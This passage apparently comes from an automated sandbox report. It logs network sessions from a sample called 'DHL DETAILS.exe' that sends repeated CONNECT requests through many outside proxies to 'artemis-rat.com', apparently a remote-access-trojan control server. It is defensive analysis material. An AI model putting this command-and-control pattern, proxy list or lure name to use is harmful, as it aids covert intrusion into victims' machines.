                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781301975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.936193943 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1005192.168.2.553044202.162.219.1010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.336605072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1006192.168.2.553108162.159.242.62806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.336606026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.833240986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.994244099 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1007192.168.2.553066129.213.150.20580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.336787939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1008192.168.2.55245792.205.110.47171586352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.339895964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536355019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1009192.168.2.553126132.148.245.169387806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.339988947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.833352089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.333511114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333523989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1010192.168.2.550833162.241.158.204505636352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.340342999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333273888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1011192.168.2.553138104.17.50.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.342999935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.499794006 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1012192.168.2.551000164.92.86.113573916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.353552103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.380120993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1013192.168.2.55305551.15.247.93163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.356024027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1014192.168.2.552404200.174.198.9588886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.360259056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.810508966 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:32.762672901 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:33.845633984 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1015192.168.2.553171104.20.198.49806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.360719919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.515435934 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1016192.168.2.553191185.238.228.96806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.386589050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.543577909 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1017192.168.2.553190104.25.58.39806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.386591911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.543715000 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1018192.168.2.550914162.241.6.97446076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.387029886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.567462921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1019192.168.2.55317565.49.38.20231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.387088060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.561243057 CET536INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3978
                                                                                    X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><t


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1020192.168.2.553216104.21.31.189806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.387548923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.543697119 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1021192.168.2.55296547.91.65.2331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.387880087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.517338991 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1022192.168.2.552876123.56.1.5031296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.387887001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.973722935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1023192.168.2.553134129.213.150.205806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.390558958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1024192.168.2.553048212.108.155.20590906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.394428015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1025192.168.2.551848111.20.217.17890916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.397655010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.567485094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1026192.168.2.553247172.67.181.97806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.402679920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.557787895 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1027192.168.2.553049202.83.102.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.403136015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1028192.168.2.553263104.16.105.106806352C:\Users\user\Desktop\DHL DETAILS.exe
